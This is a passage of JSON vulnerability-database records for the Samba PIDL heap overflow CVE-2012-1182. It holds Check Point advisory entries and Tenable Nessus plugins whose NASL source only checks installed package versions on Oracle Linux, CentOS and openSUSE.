"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2013-12-29T00:00:00", "id": "CPAI-2013-2506", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-26T09:30:28", "description": "An out-of-bounds array access vulnerability has been reported in Samba. The vulnerability is due to an error in the RPC code generator, resulting in a heap memory corruption. A remote attacker can exploit this issue by sending specially crafted SMB traffic to an affected server. Successful exploitation could allow an attacker to execute arbitrary code in the security context of the logged-on user.", "cvss3": {}, "published": "2012-10-14T00:00:00", "type": "checkpoint_advisories", "title": "Samba DCE RPC IDL Parser Out-of-bounds Array Access (CVE-2012-1182)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182"], "modified": "2013-11-20T00:00:00", "id": "CPAI-2012-317", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-08-19T12:53:34", "description": "From Red Hat Security Advisory 2013:0515 :\n\nUpdated openchange packages that fix one security issue, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange servers using native protocols. Evolution-MAPI uses these libraries to integrate the Evolution PIM application with Microsoft Exchange servers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler. As OpenChange uses code generated by PIDL, this could have resulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version of PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0, which provides a number of bug fixes and enhancements over the previous version, including support for the rebased samba4 packages and several API changes. (BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee and himself as the organizer, a segmentation fault occurred in the memcpy() function. Consequently, the evolution-data-server application terminated unexpectedly with a segmentation fault. This bug has been fixed and evolution-data-server no longer crashes in the described scenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages with a large message body or with extensive attachment. This was caused by minor issues in OpenChange's exchange.idl definitions. This bug has been fixed and OpenChange now sends extensive messages without complications. (BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated packages, which fix these issues and add these enhancements.", "cvss3": {"score": null, "vector": null}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : openchange (ELSA-2013-0515)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:evolution-mapi", "p-cpe:/a:oracle:linux:evolution-mapi-devel", "p-cpe:/a:oracle:linux:openchange", "p-cpe:/a:oracle:linux:openchange-client", "p-cpe:/a:oracle:linux:openchange-devel", "p-cpe:/a:oracle:linux:openchange-devel-docs", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2013-0515.NASL", "href": "https://www.tenable.com/plugins/nessus/68752", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0515 and \n# Oracle Linux Security Advisory ELSA-2013-0515 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68752);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0515\");\n\n script_name(english:\"Oracle Linux 6 : openchange (ELSA-2013-0515)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0515 :\n\nUpdated openchange packages that fix one security issue, several bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange\nservers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version\nof PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version, including support for the rebased samba4 packages\nand several API changes. (BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee\nand himself as the organizer, a segmentation fault occurred in the\nmemcpy() function. Consequently, the evolution-data-server application\nterminated unexpectedly with a segmentation fault. This bug has been\nfixed and evolution-data-server no longer crashes in the described\nscenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages\nwith a large message body or with extensive attachment. This was\ncaused by minor issues in OpenChange's exchange.idl definitions. This\nbug has been fixed and OpenChange now sends extensive messages without\ncomplications. (BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated\npackages, which fix these issues and add these enhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-February/003302.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openchange packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:evolution-mapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:evolution-mapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange-devel-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"evolution-mapi-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"evolution-mapi-devel-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-client-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-devel-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-devel-docs-1.0-4.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"evolution-mapi / evolution-mapi-devel / openchange / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:55:48", "description": "Updated samba4 packages that fix one security issue, multiple bugs, and add various enhancements are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls. This could result in code generated by the PIDL compiler to not sufficiently protect against buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which provides a number of bug fixes and enhancements over the previous version. In particular, improved interoperability with Active Directory (AD) domains. SSSD now uses the libndr-krb5pac library to parse the Privilege Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity Management, which relies on the capabilities of the samba4 client library, is included as a Technology Preview. This functionality and server libraries, is included as a Technology Preview. This functionality uses the libndr-nbt library to prepare Connection-less Lightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security Authority (LSA) and Net Logon services to allow verification of trust from a Windows system. Because the Cross Realm Kerberos Trust functionality is considered a Technology Preview, selected samba4 components are considered to be a Technology Preview. For more information on which Samba packages are considered a Technology Preview, refer to Table 5.1, 'Samba4 Package Support' in the Release Notes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was rebooted, Winbind sometimes failed to reconnect when requested by 'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users using the wbinfo tool failed. This update applies upstream patches to fix this problem and now looking up a Security Identifier (SID) for a username, or a username for a given SID, works as expected after a domain controller is rebooted. (BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages, which fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat Enterprise Linux 6.4 and you have Samba in use, you should make sure that you uninstall the package named 'samba4' to avoid conflicts during the upgrade.", "cvss3": {"score": null, "vector": null}, "published": "2013-03-10T00:00:00", "type": "nessus", "title": "CentOS 6 : samba4 (CESA-2013:0506)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:samba4", "p-cpe:/a:centos:centos:samba4-client", "p-cpe:/a:centos:centos:samba4-common", "p-cpe:/a:centos:centos:samba4-dc", "p-cpe:/a:centos:centos:samba4-dc-libs", "p-cpe:/a:centos:centos:samba4-devel", "p-cpe:/a:centos:centos:samba4-libs", "p-cpe:/a:centos:centos:samba4-pidl", "p-cpe:/a:centos:centos:samba4-python", "p-cpe:/a:centos:centos:samba4-swat", "p-cpe:/a:centos:centos:samba4-test", "p-cpe:/a:centos:centos:samba4-winbind", "p-cpe:/a:centos:centos:samba4-winbind-clients", "p-cpe:/a:centos:centos:samba4-winbind-krb5-locator", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2013-0506.NASL", "href": "https://www.tenable.com/plugins/nessus/65141", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0506 and \n# CentOS Errata and Security Advisory 2013:0506 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65141);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0506\");\n\n script_name(english:\"CentOS 6 : samba4 (CESA-2013:0506)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba4 packages that fix one security issue, multiple bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was\nrebooted, Winbind sometimes failed to reconnect when requested by\n'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users\nusing the wbinfo tool failed. This update applies upstream patches to\nfix this problem and now looking up a Security Identifier (SID) for a\nusername, or a username for a given SID, works as expected after a\ndomain controller is rebooted. (BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure\nthat you uninstall the package named 'samba4' to avoid conflicts\nduring the upgrade.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-March/019498.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c7fd5e17\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2013-February/000689.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?189565c5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1182\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:49:24", "description": "Samba upgrade to version 3.6.3 fixes the following security issue :\n\n - PIDL based autogenerated code allows overwriting beyond of allocated array. Remove attackers could exploit that to execute arbitrary code as root (CVE-2012-1182, bso#8815, bnc#752797)\n\nPlease see /usr/share/doc/packages/samba/WHATSNEW.txt from the samba-doc package or the package change log (rpm -q --changelog samba) for more details of the version update.", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : samba (openSUSE-SU-2012:0508-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ldapsmb", "p-cpe:/a:novell:opensuse:libldb-devel", "p-cpe:/a:novell:opensuse:libldb1", "p-cpe:/a:novell:opensuse:libldb1-32bit", "p-cpe:/a:novell:opensuse:libldb1-debuginfo", "p-cpe:/a:novell:opensuse:libldb1-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbsharemodes-devel", "p-cpe:/a:novell:opensuse:libsmbsharemodes0", "p-cpe:/a:novell:opensuse:libsmbsharemodes0-debuginfo", "p-cpe:/a:novell:opensuse:libtalloc-devel", "p-cpe:/a:novell:opensuse:libtalloc2", "p-cpe:/a:novell:opensuse:libtalloc2-32bit", "p-cpe:/a:novell:opensuse:libtalloc2-debuginfo", "p-cpe:/a:novell:opensuse:libtalloc2-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libtdb-devel", "p-cpe:/a:novell:opensuse:libtdb1", "p-cpe:/a:novell:opensuse:libtdb1-32bit", "p-cpe:/a:novell:opensuse:libtdb1-debuginfo", "p-cpe:/a:novell:opensuse:libtdb1-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libtevent-devel", "p-cpe:/a:novell:opensuse:libtevent0", "p-cpe:/a:novell:opensuse:libtevent0-32bit", "p-cpe:/a:novell:opensuse:libtevent0-debuginfo", "p-cpe:/a:novell:opensuse:libtevent0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:samba-32bit", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-debuginfo", "p-cpe:/a:novell:opensuse:samba-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:samba-devel", "p-cpe:/a:novell:opensuse:samba-krb-printing", "p-cpe:/a:novell:opensuse:samba-krb-printing-debuginfo", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit", "cpe:/o:novell:opensuse:11.4"], "id": "OPENSUSE-2012-224.NASL", "href": "https://www.tenable.com/plugins/nessus/74601", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-224.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74601);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"openSUSE Security Update : samba (openSUSE-SU-2012:0508-1)\");\n script_summary(english:\"Check for the openSUSE-2012-224 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Samba upgrade to version 3.6.3 fixes the following security issue :\n\n - PIDL based autogenerated code allows overwriting beyond\n of allocated array. Remove attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\nPlease see /usr/share/doc/packages/samba/WHATSNEW.txt from the\nsamba-doc package or the package change log (rpm -q --changelog samba)\nfor more details of the version update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=752797\"\n );\n script_set_attribute(\n 